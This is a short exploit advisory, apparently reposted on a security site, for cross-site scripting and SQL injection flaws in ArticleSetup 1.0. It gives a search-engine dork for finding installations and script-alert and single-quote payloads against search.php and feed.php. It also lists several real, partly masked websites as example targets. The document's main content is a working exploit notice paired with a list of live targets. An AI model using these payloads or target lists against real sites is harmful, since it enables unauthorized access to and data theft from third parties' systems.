ArticleSetup Multiple Vulnerabilities

2013.09.30
Credit: DevilScreaM
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
Dork: intext:Powered By Article Marketing

#Exploit Title : ArticleSetup Multiple Vulnerabilities #Author : DevilScreaM #Date : 21/09/2013 #Category : Web Applications #Vendor : http://www.articlesetup.com/ #Version : 1.0 #Dork intext:Powered By Article Marketing #Vulnerability : Cross Site Scripting , SQL Injection #Tested On : Windows 7, Ubuntu (Mozila & Chrome) #Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker Cross Site Scripting http://site-target/search.php?s=[XSS] Example http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script> #XSS at Page Admin http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script> =================================================================================== SQL Injection Vulnerability http://site-target/feed.php?cat=[SQL Injection] http://site-target/search.php?s=[SQL Injection] Example http://www.frX.au/feed.php?cat=100' http://www.frX.com.au/search.php?s=123' ==================================================================================== Example Target http://freeaXom.au/feed.php?cat=100' http://alfitXXX99.net/artikel/feed.php?cat=2' http://demoXXftaculous.com/ArticleSetup/feed.php?cat=100' http://oromXXtionary.com/articles/feed.php?cat=1' http://beinXhoppers.com/article/feed.php?cat=44' http://acXon.eu/article/feed.php?cat=54' http://sitevXna.com/feed.php?cat=12' http://www.artiXshub.in/feed.php?cat=10'


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top